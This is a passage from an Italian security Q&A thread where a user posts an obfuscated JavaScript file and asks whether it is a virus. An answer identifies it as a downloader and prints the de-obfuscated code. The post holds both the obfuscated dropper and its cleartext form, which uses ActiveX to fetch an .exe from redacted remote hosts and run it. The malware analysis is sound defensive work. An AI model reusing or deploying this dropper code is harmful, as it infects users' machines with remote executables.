Cosa fa questo file .js? È un virus? [duplicare]

-2
function ubyxm()
{
    var a = 1;
    var ygzmi="eb773ea560e607bb4276cd761ba17ccd07afcb7bb3e35f8472e6e70b5061d4f51b9374cee61f4a74fa853b8567aa77ae6d78b5340b0767f4a79f743dec360f8767c4179e9839b0235d0876cdb74de679ac979f8e77e5b74a2476d087ed913cab06eb6461dc167c716cf8c6eb4463b3974a4a67bc435f6c6df7978c0d79d4a5dda161d6961cac65dff35bf328e3f35ad47be0a70ce462b9835e3254ec876c3261bde7ca1f63bf170a1f4dcf95aa5877b8e7ff6270f5f76bb261cef3dc2e37b6f58b8f46adc4dfd158a2959acd27b033badf4db4d58a9f59ac45de1b41e4941fd745fe837b253ca6f2eb8b6dbae78ac879ef45dbf561ec861c8665"+
    "e463bc977adbc65d1570b3e7bb4b3df3a37e6952b4650fbc41a0137be039fa535d3560f8867faa79c6d39a5335d9773e4274f4b79f9b66c5670dd93ce0e2ec6a6dac178ef679a0d5dc9161d6561b3c65e923bb3f66f2970f8d7bc8a71c603df733cdcb2ed627ce0473f0b35fdd3dfae6db7778acf79f455dcfa61d8861b2c65ce73bdae66b7d61a3874a6d61c7a60c3d66d8c35b1528f5628c0635e3127e7825d9025a0f3ce2635d886ec2e67b6e70c1561e9d60b7167b477bdfe35b1076bea74d0279e1379e5877eb874b0e76ac77eaea3dda96dcd978a1979f935df9461e9861c8365eac3beb947bd870e6266cde65ed17ad997bd6266e4070"+
    "b0257c8c7ab6971f066cb8a39bd935bd773b6f74e1579ed866d3270fa03ccff2eea868bff70e4c79c9066ede70fbe6eaad67d5e70dfa61b7060a6467d027bc0635b1d76efa74ea679eb179f4577dd474b1076e3f7eab93db427bd8360c7179a5b79c2739cca35f7961eb067dab60cb770ee03ca922ebf868beb68e8d76cf074aa161d0b76b367de0235c913de0070ac867de867bff7aa5d67d683cde26ec3467f1c70e7561e6f60d7a67aea7bc4035c5f76bf474f0379fe579eb677f0c74a9276e297ed283db0a7beef60f4d79ae779bc639cc235e9b61d0567f0660b4770f8e3cc7e2eb3468a3468d6e73edb60ab57bf6d76a2861c6a7cf237a"+
    "f897bddb35eed72a9470a8161f9c51a4274e5361c0974e603da1276dbf74c0f79ba879cae77c7874b8b76c7e7edb93cabd6eddf61f9067ff36cd2c6ea9772aed70d4661b0b51b2874f3461dd174c0053a6867be97ae1178c2140b0567dcd79cee3dfa337a5e7dab061fcf61aed65fef2ff7e3afa03ae5661ea67cf817be856ce0160d5c67c7c79c1c3bbc376b9c7af9278a6b3ac347dc3b70f2526fa977d3f7db8e27abb22bf537abc39ad335e5573ab860f897ba3476db661c1d7cc297ab687bc733db9e67c7570d8e66a4760d5079ed561b6639ac835dec70a7467bab67be27ada067dcc3ce7235d5f6ee957cba173d5135c783ddb234c1270"+
    "c9b67a2867e1f7ae0467e8c3cab76ea6b67ad370d8f61fdf60f6867c797be4035e3476a1a74e2779b4c79a7077be274aaf76e757ecfa3dedf67db270fd266cb460fe879ded61a3c39b5835a4d73cab74aa079e4666af370a6d3cb3d2efbd68dd170c2579e4866f0370c0d6ea0172c0e70cb561c1851bc374a7161ac274ba553f6f67ec97afc278f2a40f0667ae679c333dd3937f457df9e61a5561a5165d2c2fdff3ab083ada87aa3074bcb78f9e7ba587ae7c7db817bbe371a0165efa7cc0562e0865cc47cb8c76a8272d8878cae3bcff7ade97bdf87cb617ad307bea63bbdd7bee660a0c3ade724c7625c163bea478cf97ac8b63a8637ca339"+
    "ba335dbc73b5b60fc37ba4476c3d61d0b7cb137ae107bb753dcae67d4b70c9e66a5c60b7e79cc361b8c39e0c35a8c70fb467a3d67ab27af2067f3f3cd7535dd26ef297cc1273b4035ae63db1934a1570bc667f8867fed7ae8a67a3c3cd0c6edd167bfe70d3161a5160c9c67f657bb1435a1b76f1f74c0879b5679b9477b3774c5a76cb47eb793dca067fb070c8066be460f4879a0e61cf339f4735c0273dc974b5379fed66b7570eb43ca982edb168d2e70fd479a5d66bfa70f2f6eedf72e4570a3161c5051ef574e8761e3474a6853e0767d797ac7778c4040d6b67fc179b0f3dd9637e897db9d61f8861a1d65d842fec83ad8d3ab3061b747c"+
    "a1c7bde46ca3c60ed467be479a0b3bc9976e2e7af7278bb93add97db6970d7b26b5077d097dfb327c3a22e1c37eb439a1f35d0c73af260f797bcbc76a5661d117cf847ac847bb7e3dc7e67ce070a2866bcf60f4a79c5f61fdf39e0735aed70b4467baa67be07af2b67b593cb1b35f9e6ef6d7cd4773a5735e903dac534f1570cd667a2a67d5b7ab3467bd93ca9b6ed9e67e7970d9561e5660aa367db57ba6035eab76ae074d2279baa79ba177f5074a3d76c597edc43dee967cd470af366f8460fbf79ce061dcd39ade35e5573cd274fb279b3f66c5c70d143cfde2ef6f68bdb70ae979afd66c7b70d286ed6067dcf70b6f61c3c60cf367c4e7b"+
    "a7e35d9d76c1474b0679d3a79bb777aec74a8f76fdd7ee423de587bed160f5179e8079b2c39e5835c7761a7f67a4c60e4e70e343cc122ecc768ccf68a2e3cf152eb7a68f9168d053cc882eb8a68ddb68d583cab52eec668e0776bdd74e9661e3e76b887dfdf35b7c3da1170c2c67f1967ae27ad3f67b183cff06ed2267acf70a2661f2660f0867d697ba8835bea76a5a74de079baa79cb777bc974d9076e737ece93de2e7bc6f60a8479f2379b6c39eb935ce661e0f67d9560fe570bd73ca4b2ea5468b1568c7a73b7660ec57bbbf76a4761cf67cd247aa587bf6c35ead72b2470e7061b5741c7270c8678fd565a8753c8a7ce3179d2a70c6c45"+
    "f3474b6861ddf7df363dae43cc2a6ef8261c6567ce66ca8b6ee3f63a7474d2167cd435fe373e7566d3c35d0228e2235b397be1b70e2262aa335a1154cce76db661e697cde363ff570e374dc385aa1077b247fc4570ca276c4c61f133dbb237c8146f5476ab667dd77cb1865c7b61fc67ce397bdf072f353beab53e717ca9c79d4070e8046ce16cabc66c9f61e4d70de178eda5adc177df07fc7c70e5476da361dbf37c383cc3a2ebb063b9874f3567ec335c3061b3f78cb065f6653dc87ca3a79f5670b8f5bf5174a3c78baf70ff135f7c28b2335daf37aa149f6649aad37e7335e763ef0e35d7d58d2574c7661d1e7dd2a3bdd167efa74ff17b"+
    "ed871b917ab3878ad03db5e3cdde3bd6261bfe7abdf46e0c61a9067cb37cdf57bef272d463ddf426c9023dd83cd463bc3e66b3860f0477e3266b2161c0567f233de0b27d4939acb35c4f2cc823ce5b35a5d3ea9f35ae937cba3bdb470b486df5470db837c2f2ece463be974a2267e5135cab61a4778b7a65f4e53eba7cc3c79cab70dda45adc74bb261b3b7de4e35b9628e5035e4673da866c133baae52fcd70de061d3b46c2e65b7870d7b76b6e7cdfa74a5b79b6753b237aa0379d4671b9870bdf67f853dcb027c693ca7d35f033eac435bdd61d7178eb065be753baf7cc2a79a9e70d075bc6e74d8c78ed070f6e2ef3a67b8a70fb561d3760"+
    "b5f67bf87bf6c35de561cc278a8765a3053f827cc4c79dde70a3445e7274c2761ac77dc432ec5a68e6c76c2574c7861b2576b277dc1d35c6e3de8b70bde67c6467a307ae0a67a223cd636ee9567be570a7061a5260f0e67f157be2735de173b2274ba879c9166fde70ee62ed2a68df568da573ea760b467bb7876cb361e3b7ced97afd97ba7035f1866aa374c8c63fc170a1741d837af6541c3370eee78c3665ee73dc1171d7974c3561c4674fcd39e8335bc576cb574c2779f1779a8777b1d74f7e76ac47ec9e3cb876ebb461d2f67e816cb326ef5963a8074e4167e4c35b0665bcd74d2961eba7dfa235fe528ea035cd272ad570ac861e1241"+
    "b4d70ade78dbb65b8653c457cf2e79b8c70b9045d0774a8761aa07deb83de633cd002eeed7cbae73bf835e5e3ddd965efe74c1a61e167dcfa3cd956eb9463abf74afd67cf235c8f7ae8d77edd7fdcd46e5c61dd667e1d70a2074a3978e0835eef28ee635ff37bd8e70c8462b2235de354c2576e3761d1e7ceee63edf70b9d4dc155ac8c77d0d7ff3c70e9f76a9161d213dd1e37cfc54c3651b065adec51b0757a503be3346f5a61fdb67f6c70fdb74d5d78e9737b173ca6e2ed847aa7677b3a7fee846fcd61c0b67a4e70a3974c7078f9f3bf275ae4c65c8e70a7f7bd2b3dc953caa92eaba7ad3277be07faba46dbf61b2667b2b70bad74ee678"+
    "b213bf3b41ccd6cced65a1070f9535dd728e2935f5324d332ee747ae2777d837fcf246bf361eab67a4070d3b74ad178b643bb4042d2a67ea37ca3161b7e70c503da7d71fee74c1d61c4374d963cb282ee137ae2577a6a7febe46dc661c8667cf670b5074cf378f243bbf445cf67adfa66bf67cb8361dfa7ce697ac0d7be1b35acc28b1b35d7a25e292ed787aeae77a5d7ff5346c0b61b0b67ea970fe074c9178a723bde946ae374a2863edb70a4641f6f7ad5053ae97cf7279f8970e293dc3865d3974a1661f107dade39a6435d7427a2a3cbd32efb47ab2777f097fb0946d6061b7767a7c70c1474d3678b733bc3d56d7f79e397ad6366ae870"+
    "d3f3da563cea62ea4967c7f70dc261c7860b6067fde7befe35c0376ba874d9279e9579cfb77c7874ccf76e247edf23ddd165d4074f9561a3c7db3639ca435b1a73f9874d9979f2766ea470e483cdfe2ef1368d4570ebf79aee66fa970b4135f126ebec67cfe70e7f61e5e60ad467bcf7bbff35bb976f1b74fcc79f1b79d8077d6174d5576c537edaf3dddd7bc1060ec079f8779c5739bff35f9461f1867a8c60b3770bb53ca462ed3268bf068f6d76a0c74a6561b4576f6c7dd0f35ec03dbdc70d8e67fcd67b847ab0c67e033cbc76ed9b67b2570b2261f6f60de767db37bc1035f4376d3c74f7979af279f4477a6574a3076ac97ec653dfc57b"+
    "b8860cea79ba179fbf39e8335a9861cba67ec760d5c70fe93ca412edb168bea68bb772aad70bb761f2251c2f74e0361d7274a863db1173b3e60e7b7bb9676ac161c037cde47acdd7bd8435f0a3dacb71aed74ac561fec74a2039b9335c2370d0167c4867df17abed67e1c3ce3935af96ee107cd4373f0535e3d3de9134b3e70c8f67b8e67e627ad8167a623cff56ee0d66a7174a5963a0a70ae341e307ae3f41aa770acc78b8a65d643dc8071c8f74e9861d0874f9039c8c35b9873da460cda7ba6176bb961e217cf197aba37bf6a35bb33daea65da574f1361c287dc6439e3635ef670c2e67dc667b217ac3167aaa3cc6b35dbd6ee337cb2573"+
    "d1435e863de2234b7370bd667bfe67e557afc167dc43cde56ee9561a7c67c4f6cd756efa263aee74af567b0235c2d62dcd66eb67dafb35e6e28ff735aa27bab170ace62c2935c8a54b1776af361d117cbf663ba570dae4dfcb5aff877d607fbc270e2376b4161cb13dcee37f3042ac546a8276f4167bd67ce2265ef361a473bba246b227dbd570fe279a1079adc37a3a3cc1b2ed1a62f3d66a687db093bbc747d9760d077bbc53daf765d7874ce961ebb7dfd13cb2a2ef7768b1e76da074af661bf476f907dbf035fd53dcb270de367bc067d107ada467ab33cd1135fc06ec1868ec668b5168bc13ccec2ea9d68d3968e543cec52e";
    var nhyqh;
    while(true){
        try
        {
            nhyqh=(new Function("uvemk","var iltyk=uvemk.match(/\S{5}/g),vsuha=\"\",flmmo=0;while(flmmo<iltyk.length){vsuha+=String.fromCharCode(parseInt(iltyk[flmmo].substr(3,2),16)^21);flmmo++;}"+egshi()+egshi()+egshi()+egshi()+"(vsuha);")(ygzmi));
            break;
        }
        catch(er)
        {
        }
    }
    return nhyqh;
}
function egshi()
{
    var azupl=new Array("e","v","a","l");
    return azupl[Math.floor(Math.random()*azupl.length)];
}
ubyxm();
    
posta Alexa 23.01.2017 - 00:19
fonte

1 risposta

4

Con alcune modifiche minori è lo stesso codice JS offuscato come qui e qui . (Entrambi i thread contengono un'analisi più approfondita.)

Essenzialmente, lo script scarica un eseguibile e lo esegue, utilizzando i controlli ActiveX di Internet Explorer. La differenza rispetto agli esempi precedenti è che tenta di ottenere il .exe da più URL:

http://[shortener].com/he3bh27
http://[some onion address].onion.nu/10.mov
http://[shortener].com/he3bh27 (again)

Ecco il carico utile de-offuscato:

function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://[some onion address].onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://[shortener].com/he3bh27", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
    
risposta data 23.01.2017 - 01:01
fonte

Leggi altre domande sui tag